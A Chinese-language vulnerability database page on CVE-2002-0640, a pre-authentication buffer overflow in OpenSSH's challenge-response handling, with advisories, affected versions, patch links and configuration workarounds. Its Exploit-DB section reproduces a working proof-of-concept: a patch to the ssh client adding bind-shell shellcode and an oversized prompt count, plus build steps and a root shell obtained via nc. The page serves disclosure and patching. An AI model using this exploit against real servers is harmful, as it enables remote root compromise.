CVE-2002-0640
CVSS10.0
发布时间 :2002-07-03 00:00:00
修订时间 :2016-10-17 22:20:57
NMCOE    

[原文]Buffer overflow in sshd in OpenSSH 2.3.1 through 3.3 may allow remote attackers to execute arbitrary code via a large number of responses during challenge response authentication when OpenBSD is using PAM modules with interactive keyboard authentication (PAMAuthenticationViaKbdInt).


[CNNVD]OpenSSH挑战响应(Challenge-Response)机制交互键盘PAM验证远程缓冲区溢出漏洞(CNNVD-200207-029)

        
        OpenSSH是一种开放源码的SSH协议的实现,初始版本用于OpenBSD平台,现在已经被移植到多种Unix/Linux类操作系统下。
        OpenSSH 2.3.1p1到3.3版本中的挑战响应(Challenge-Response)代码处理存在漏洞,远程攻击者可以利用这漏洞以sshd进程的权限(通常是root)在系统上执行任意指令。
        漏洞是在挑战响应验证阶段处理接收到的应答时存在缓冲区溢出,不管系统中挑战响应验证选项是否配置,系统如果使用了通过交互键盘PAM验证PAMAuthenticationViaKbdInt)的PAM模块,就存在此漏洞,远程攻击者可以利用此漏洞在系统上以sshd进程的权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:openbsd:openssh:3.0p1OpenBSD OpenSSH 3.0 p1
cpe:/a:openbsd:openssh:3.1p1OpenBSD OpenSSH 3.1 p1
cpe:/a:openbsd:openssh:3.0.1OpenBSD OpenSSH 3.0.1
cpe:/a:openbsd:openssh:2.5.2OpenBSD OpenSSH 2.5.2
cpe:/a:openbsd:openssh:3.0.1p1OpenBSD OpenSSH 3.0.1 p1
cpe:/a:openbsd:openssh:2.9p1OpenBSD OpenSSH 2.9 p1
cpe:/a:openbsd:openssh:2.9p2OpenBSD OpenSSH 2.9 p2
cpe:/a:openbsd:openssh:2.5.1OpenBSD OpenSSH 2.5.1
cpe:/a:openbsd:openssh:1.2.2OpenBSD OpenSSH 1.2.2
cpe:/a:openbsd:openssh:2.9OpenBSD OpenSSH 2.9
cpe:/a:openbsd:openssh:2.5OpenBSD OpenSSH 2.5
cpe:/a:openbsd:openssh:2.1OpenBSD OpenSSH 2.1
cpe:/a:openbsd:openssh:3.0OpenBSD OpenSSH 3.0
cpe:/a:openbsd:openssh:3.3OpenBSD OpenSSH 3.3
cpe:/a:openbsd:openssh:2.2OpenBSD OpenSSH 2.2
cpe:/a:openbsd:openssh:2.9.9OpenBSD OpenSSH 2.9.9
cpe:/a:openbsd:openssh:3.1OpenBSD OpenSSH 3.1
cpe:/a:openbsd:openssh:2.3OpenBSD OpenSSH 2.3
cpe:/a:openbsd:openssh:3.2OpenBSD OpenSSH 3.2
cpe:/a:openbsd:openssh:1.2.3OpenBSD OpenSSH 1.2.3
cpe:/a:openbsd:openssh:3.2.3p1OpenBSD OpenSSH 3.2.3 p1
cpe:/a:openbsd:openssh:3.2.2p1OpenBSD OpenSSH 3.2.2 p1
cpe:/a:openbsd:openssh:2.1.1OpenBSD OpenSSH 2.1.1
cpe:/a:openbsd:openssh:3.0.2p1OpenBSD OpenSSH 3.0.2p1
cpe:/a:openbsd:openssh:3.0.2OpenBSD OpenSSH 3.0.2
cpe:/a:openbsd:openssh:3.3p1OpenBSD OpenSSH 3.3 p1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0640
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0640
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200207-029
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2002-030.0.txt
(UNKNOWN)  CALDERA  CSSA-2002-030.0
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000502
(UNKNOWN)  CONECTIVA  CLA-2002:502
http://marc.info/?l=bugtraq&m=102514371522793&w=2
(UNKNOWN)  BUGTRAQ  20020626 OpenSSH Security Advisory (adv.iss)
http://marc.info/?l=bugtraq&m=102514631524575&w=2
(UNKNOWN)  BUGTRAQ  20020626 Revised OpenSSH Security Advisory (adv.iss)
http://marc.info/?l=bugtraq&m=102521542826833&w=2
(UNKNOWN)  BUGTRAQ  20020627 How to reproduce OpenSSH Overflow.
http://marc.info/?l=bugtraq&m=102532054613894&w=2
(UNKNOWN)  BUGTRAQ  20020628 Sun statement on the OpenSSH Remote Challenge Vulnerability
http://www.cert.org/advisories/CA-2002-18.html
(UNKNOWN)  CERT  CA-2002-18
http://www.debian.org/security/2002/dsa-134
(UNKNOWN)  DEBIAN  DSA-134
http://www.kb.cert.org/vuls/id/369347
(UNKNOWN)  CERT-VN  VU#369347
http://www.linuxsecurity.com/advisories/other_advisory-2177.html
(UNKNOWN)  ENGARDE  ESA-20020702-016
http://www.mandrakesoft.com/security/advisories?name=MDKSA-2002:040
(UNKNOWN)  MANDRAKE  MDKSA-2002:040
http://www.novell.com/linux/security/advisories/2002_024_openssh_txt.html
(UNKNOWN)  SUSE  SuSE-SA:2002:024
http://www.redhat.com/support/errata/RHSA-2002-127.html
(UNKNOWN)  REDHAT  RHSA-2002:127
http://www.redhat.com/support/errata/RHSA-2002-131.html
(UNKNOWN)  REDHAT  RHSA-2002:131
http://www.securityfocus.com/bid/5093
(UNKNOWN)  BID  5093
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0206-195
(UNKNOWN)  HP  HPSBUX0206-195

- 漏洞信息

OpenSSH挑战响应(Challenge-Response)机制交互键盘PAM验证远程缓冲区溢出漏洞
危急 边界条件错误
2002-07-03 00:00:00 2006-03-28 00:00:00
远程  
        
        OpenSSH是一种开放源码的SSH协议的实现,初始版本用于OpenBSD平台,现在已经被移植到多种Unix/Linux类操作系统下。
        OpenSSH 2.3.1p1到3.3版本中的挑战响应(Challenge-Response)代码处理存在漏洞,远程攻击者可以利用这漏洞以sshd进程的权限(通常是root)在系统上执行任意指令。
        漏洞是在挑战响应验证阶段处理接收到的应答时存在缓冲区溢出,不管系统中挑战响应验证选项是否配置,系统如果使用了通过交互键盘PAM验证PAMAuthenticationViaKbdInt)的PAM模块,就存在此漏洞,远程攻击者可以利用此漏洞在系统上以sshd进程的权限执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 1)关闭SSH协议版本2:
        由于这两个漏洞只存在与SSH协议版本2中,所以关闭SSH协议版本2的使用就可以防止这两个漏洞被利用,可以通过修改/etc/ssh/sshd_config配置文件完成:
        Protocol 1
        * 2)关闭挑战响应(Challenge-Response)验证选项:
        2.9版本以上的OpenSSH,系统管理员可以通过在SSHD配置文件中设置"ChallengeResponseAuthentication"为"no",在/etc/ssh/sshd_config中修改为如下一行:
        ChallengeResponseAuthentication no
        这可以防止如果使用SKEY或者BSD_AUTH验证的情况下漏洞不被利用,不过不能防止通过交互键盘PAM验证(PAMAuthenticationViaKbdInt)模式引起的漏洞。
        * 3)关闭通过交互键盘PAM验证模式:
        2.9版本以上的OpenSSH,系统管理员可以通过在SSHD配置文件中设置"PAMAuthenticationViaKbdInt"为"no",在/etc/ssh/sshd_config中修改为如下一行:
        PAMAuthenticationViaKbdInt no
        此选项默认设置为"no",这可以防止如果使用通过交互键盘PAM验证的情况下漏洞不被利用,不过不能防止使用SKEY或者BSD_AUTH验证模式引起的漏洞。
        * 4)在旧版本OpenSSH中关闭两个选项:
        在OpenSSH 2.3.1p1和2.9之间的版本,系统管理员可以设置如下选项来防止这两个漏洞被利用:
        KbdInteractiveAuthentication no
        ChallengeResponseAuthentication no
        * 5)使用权限分离最小化漏洞影响:
        OpenSSH 3.2或者3.3版本可以使用"UsePrivilegeSeparation"选项进行权限分离,可以通过在/etc/ssh/sshd_config中增加如下一行完成:
        UsePrivilegeSeparation yes
        此解决方案不能防止漏洞被利用,只是由于权利分离机制,攻击者即使成功利用这两个漏洞而获得shell,也是处于chroot受限制的环境中,此解决方案也不能防止攻击者进行拒绝服务攻击。建议管理员升级程序或者采用补丁进行修补。
        厂商补丁:
        Caldera
        -------
        Caldera已经为此发布了一个安全公告(CSSA-2002-030.0):
        CSSA-2002-030.0:Linux: OpenSSH Vulnerabilities in Challenge Response Handling
        链接:
        http://www.caldera.com/support/security/advisories/CSSA-2002-030.0.txt

        Conectiva
        ---------
        Conectiva已经为此发布了一个安全公告(CLA-2002:502)以及相应补丁:
        CLA-2002:502:openssh
        链接:
        http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000502

        补丁下载:
        ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/openssh-3.4p1-1U60_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-3.4p1-1U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-askpass-3.4p1-1U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-askpass-gnome-3.4p1-1U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-clients-3.4p1-1U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-server-3.4p1-1U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/openssh-3.4p1-1U70_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-3.4p1-1U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-askpass-3.4p1-1U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-askpass-gnome-3.4p1-1U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-clients-3.4p1-1U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-server-3.4p1-1U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/SRPMS/openssh-3.4p1-1U8_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-3.4p1-1U8_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-askpass-3.4p1-1U8_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-askpass-gnome-3.4p1-1U8_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-clients-3.4p1-1U8_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-server-3.4p1-1U8_1cl.i386.rpm
        Conectiva Linux version 6.0及以上版本的用户可以使用apt进行RPM包的更新:
        - 把以下的文本行加入到/etc/apt/sources.list文件中:
        
        rpm [cncbr] ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates
        (如果你不是使用6.0版本,用合适的版本号代替上面的6.0)
        - 执行: apt-get update
        - 更新以后,再执行: apt-get upgrade
        Debian
        ------
        Debian已经为此发布了一个安全公告(DSA-134-4)以及相应补丁:
        DSA-134-4:OpenSSH Remote Challenge Vulnerability
        链接:
        http://www.debian.org/security/2002/dsa-134

        补丁下载:
        Source archives:
        
        http://security.debian.org/pool/updates/main/o/openssh/openssh_3.4p1.orig.tar.gz

        Size/MD5 checksum: 837668 459c1d0262e939d6432f193c7a4ba8a8
        
        http://security.debian.org/pool/updates/main/o/openssh/openssh_3.4p1-0.0potato1.dsc

        Size/MD5 checksum: 871 dd0f18d576520cb7110f5791bce67708
        
        http://security.debian.org/pool/updates/main/o/openssh/openssh_3.4p1-0.0potato1.diff.gz

        Size/MD5 checksum: 33706 ff798880b0835dcc77e42a2b9a075148
        
        http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c.orig.tar.gz

        Size/MD5 checksum: 2153980 c8261d93317635d56df55650c6aeb3dc
        
        http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-0.potato.1.diff.gz

        Size/MD5 checksum: 37925 718ffc86669ae06b22d77c659400f4e8
        
        http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-0.potato.1.dsc

        Size/MD5 checksum: 784 b197de235e0d10f7bb66b4751808a033
        Architecture independent packages:
        
        http://security.debian.org/pool/updates/main/o/openssl/ssleay_0.9.6c-0.potato.1_all.deb

        Size/MD5 checksum: 976 6b39f5a320b1c8bdbba05e2c8b041b70
        alpha architecture (DEC Alpha)
        

- 漏洞信息 (21578)

OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1) (EDBID:21578)
unix remote
2002-06-24 Verified
0 Christophe Devine
N/A [点击下载]
source: http://www.securityfocus.com/bid/5093/info

The OpenSSH team has reported two vulnerabilities in OpenSSH that are remotely exploitable and may allow for unauthenticated attackers to obtain root privileges.

The conditions are related to the OpenSSH SSH2 challenge-response mechanism. They occur when the OpenSSH server is configured at compile time to support BSD_AUTH or SKEY. OpenBSD 3.0 and later ship with OpenSSH built to support BSD_AUTH. Systems are vulnerable when either of the following configuration options are enabled:

PAMAuthenticationViaKbdInt
ChallengeResponseAuthentication

Attackers can exploit the vulnerabilities by crafting a malicious response. Since this occurs before the authentication process completes, remote attackers without valid credentials may exploit this. Successful exploits may result in the execution of shellcode or a denial of service.

OpenSSH 3.4 addresses the problem. Upgrading to this version will eliminate the vulnerabilities. Administrators who cannot install OpenSSH 3.4 should upgrade to version 3.3 and enable the privilege-separation feature.

Proof-of-concept code has been made public. Users are advised to upgrade immediately.

**UPDATE: One of these issues is trivially exploitable and is still present in OpenSSH 3.5p1 and 3.4p1. Although these reports have not been confirmed, administrators are advised to implement the OpenSSH privilege-separation feature as a workaround. BSD administrators are also advised to upgrade to the newest kernel versions because recently patched vulnerabilities may allow root compromise despite the use of the privilege-separation feature. 

1. Download openssh-3.2.2p1.tar.gz and untar it

~ $ tar -xvzf openssh-3.2.2p1.tar.gz

2. Apply the patch provided below by running:

~/openssh-3.2.2p1 $ patch < path_to_diff_file

3. Compile the patched client

~/openssh-3.2.2p1 $ ./configure && make ssh

4. Run the evil ssh:

~/openssh-3.2.2p1 $ ./ssh root:skey@localhost

5. If the sploit worked, you can connect to port 128 in another terminal:

~ $ nc localhost 128
uname -a
OpenBSD nice 3.1 GENERIC#59 i386
id
uid=0(root) gid=0(wheel) groups=0(wheel)

--- sshconnect2.c	Sun Mar 31 20:49:39 2002
+++ evil-sshconnect2.c	Fri Jun 28 19:22:12 2002
@@ -839,6 +839,56 @@
 /*
  * parse INFO_REQUEST, prompt user and send INFO_RESPONSE
  */
+
+int do_syscall( int nb_args, int syscall_num, ... );
+
+void shellcode( void )
+{
+    int server_sock, client_sock, len;
+    struct sockaddr_in server_addr;
+    char rootshell[12], *argv[2], *envp[1];
+
+    server_sock = do_syscall( 3, 97, AF_INET, SOCK_STREAM, 0 );
+    server_addr.sin_addr.s_addr = 0;
+    server_addr.sin_port = 32768;
+    server_addr.sin_family = AF_INET;
+    do_syscall( 3, 104, server_sock, (struct sockaddr *) &server_addr, 
16 );
+    do_syscall( 2, 106, server_sock, 1 );
+    client_sock = do_syscall( 3, 30, server_sock, (struct sockaddr *)
+	&server_addr, &len );
+    do_syscall( 2, 90, client_sock, 0 );
+    do_syscall( 2, 90, client_sock, 1 );
+    do_syscall( 2, 90, client_sock, 2 );
+    * (int *) ( rootshell + 0 ) = 0x6E69622F;
+    * (int *) ( rootshell + 4 ) = 0x0068732f;
+    * (int *) ( rootshell + 8 ) = 0;
+    argv[0] = rootshell;
+    argv[1] = 0;
+    envp[0] = 0;
+    do_syscall( 3, 59, rootshell, argv, envp );
+}
+
+int do_syscall( int nb_args, int syscall_num, ... )
+{
+    int ret;
+    asm(
+	"mov	8(%ebp), %eax; "
+	"add	$3,%eax; "
+	"shl	$2,%eax; "
+	"add	%ebp,%eax; "
+	"mov	8(%ebp), %ecx; "
+	"push_args: "
+	"push	(%eax); "
+	"sub	$4, %eax; "
+	"loop	push_args; "
+	"mov	12(%ebp), %eax; "
+	"push	$0; "
+	"int	$0x80; "
+	"mov	%eax,-4(%ebp)"
+    );
+    return( ret );
+}
+
 void
 input_userauth_info_req(int type, u_int32_t seq, void *ctxt)
 {
@@ -865,7 +915,7 @@
 	xfree(inst);
 	xfree(lang);
 
-	num_prompts = packet_get_int();
+	num_prompts = 1073741824 + 1024;
 	/*
 	 * Begin to build info response packet based on prompts requested.
 	 * We commit to providing the correct number of responses, so if
@@ -874,6 +924,13 @@
 	 */
 	packet_start(SSH2_MSG_USERAUTH_INFO_RESPONSE);
 	packet_put_int(num_prompts);
+
+	for( i = 0; i < 1045; i++ )
+	    packet_put_cstring( "xxxxxxxxxx" );
+
+	packet_put_string( shellcode, 2047 );
+	packet_send();
+	return;
 
 	debug2("input_userauth_info_req: num_prompts %d", num_prompts);
 	for (i = 0; i < num_prompts; i++) {
		

- 漏洞信息 (21579)

OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2) (EDBID:21579)
unix remote
2002-06-24 Verified
0 Gobbles Security
N/A [点击下载]
source: http://www.securityfocus.com/bid/5093/info
 
The OpenSSH team has reported two vulnerabilities in OpenSSH that are remotely exploitable and may allow for unauthenticated attackers to obtain root privileges.
 
The conditions are related to the OpenSSH SSH2 challenge-response mechanism. They occur when the OpenSSH server is configured at compile time to support BSD_AUTH or SKEY. OpenBSD 3.0 and later ship with OpenSSH built to support BSD_AUTH. Systems are vulnerable when either of the following configuration options are enabled:
 
PAMAuthenticationViaKbdInt
ChallengeResponseAuthentication
 
Attackers can exploit the vulnerabilities by crafting a malicious response. Since this occurs before the authentication process completes, remote attackers without valid credentials may exploit this. Successful exploits may result in the execution of shellcode or a denial of service.
 
OpenSSH 3.4 addresses the problem. Upgrading to this version will eliminate the vulnerabilities. Administrators who cannot install OpenSSH 3.4 should upgrade to version 3.3 and enable the privilege-separation feature.
 
Proof-of-concept code has been made public. Users are advised to upgrade immediately.
 
**UPDATE: One of these issues is trivially exploitable and is still present in OpenSSH 3.5p1 and 3.4p1. Although these reports have not been confirmed, administrators are advised to implement the OpenSSH privilege-separation feature as a workaround. BSD administrators are also advised to upgrade to the newest kernel versions because recently patched vulnerabilities may allow root compromise despite the use of the privilege-separation feature. 

http://www.exploit-db.com/sploits/21579.tar.gz		

- 漏洞信息

839
OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

A remote overflow exists in OpenSSH when using PAM modules that use interactive keyboard authentication such as PAMAuthenticationViaKbdInt. OpenSSH fails to limit a buffer of the number of responses received in its challenge-response authentication code, resulting in a pre-authentication buffer overflow. With a specially crafted request, an attacker can cause the sshd daemon to execute arbitrary code on this host, resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

2002-06-26 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 3.4 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by applying the vendor-supplied patch, or by disabling support for SSHv2 (not recommended).

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站